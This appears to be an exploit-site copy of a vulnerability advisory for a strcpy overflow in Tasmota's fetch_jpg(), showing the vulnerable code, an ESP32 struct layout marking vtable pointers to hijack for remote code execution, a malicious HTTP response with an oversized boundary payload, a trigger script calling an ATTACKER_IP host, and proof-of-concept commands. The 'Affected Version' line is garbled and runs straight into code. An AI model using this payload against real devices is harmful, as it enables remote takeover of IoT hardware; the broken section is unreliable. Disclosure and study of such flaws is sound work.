Share
## https://sploitus.com/exploit?id=A4DE2B37-A9D8-5F7F-AA2C-E1454B6039E5
# CVE-2026-38426: strcpy() Stack Buffer Overflow in Tasmota fetch_jpg() boundary[40]
**CVE:** CVE-2026-38426
**Severity:** Critical (CVSS 9.8)
**Product:** Arendst Tasmota
**Affected Version:** 39 chars)
char *cp = strchr(boundary.c_str(), '=');
if (cp) {
strcpy(glob_script_mem.jpg_task.boundary, cp + 1); // NO LENGTH CHECK โ OVERFLOW!
}
```
---
## Heap Memory Layout (ESP32)
```
struct JPG_TASK layout:
+0x00 boundary[40] โ overflow starts here
+0x28 draw (bool) โ corrupted
+0x29 scale (uint8_t) โ corrupted
+0x2A xp (uint16_t) โ corrupted
+0x2C yp (uint16_t) โ corrupted
+0x2E WiFiClient โ vtable ptr overwritten โ RCE
+0x7E HTTPClient โ vtable ptr overwritten โ RCE
```
Overwriting the `WiFiClient` or `HTTPClient` vtable pointer with an attacker-controlled value triggers RCE when any virtual method (`read()`, `write()`, `connect()`) is subsequently called.
---
## Attack Scenario
The attacker runs an HTTP server that Tasmota connects to via `fetchjp()`. The server responds with a `Content-Type` header containing a boundary string longer than 39 characters:
```
HTTP/1.1 200 OK
Content-Type: multipart/x-mixed-replace; boundary=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
```
Tasmota's `strcpy()` copies 50+ bytes into the 40-byte `boundary` buffer, overflowing into adjacent struct fields.
**Trigger via Tasmota script:**
```
>D
>B
fetchjp(ATTACKER_IP:PORT/stream,0,0,1)
```
---
## Proof of Concept
```python
python3 CVE-2026-38426_poc.py --port 8888 --mode crash
python3 CVE-2026-38426_poc.py --port 8888 --mode info
```
See [CVE-2026-38426_poc.py](CVE-2026-38426_poc.py) for full implementation.
---
## Impact
- **Confidentiality:** High (RCE via vtable hijack on ESP32)
- **Integrity:** High
- **Availability:** High (guaranteed crash)
- **Attack Vector:** Network
- **Authentication:** None required
---
## Timeline
- **2026-03-29:** Vulnerability discovered and reported to MITRE
- **2026-03-29:** CVE-2026-38426 assigned
- **2026-05-xx:** Patch released by Tasmota (v15.3.0.4+)
---
## References
- [Tasmota GitHub](https://github.com/arendst/Tasmota)
- [xdrv_10_scripter.ino](https://github.com/arendst/Tasmota/blob/development/tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino)
- CVE-2026-38426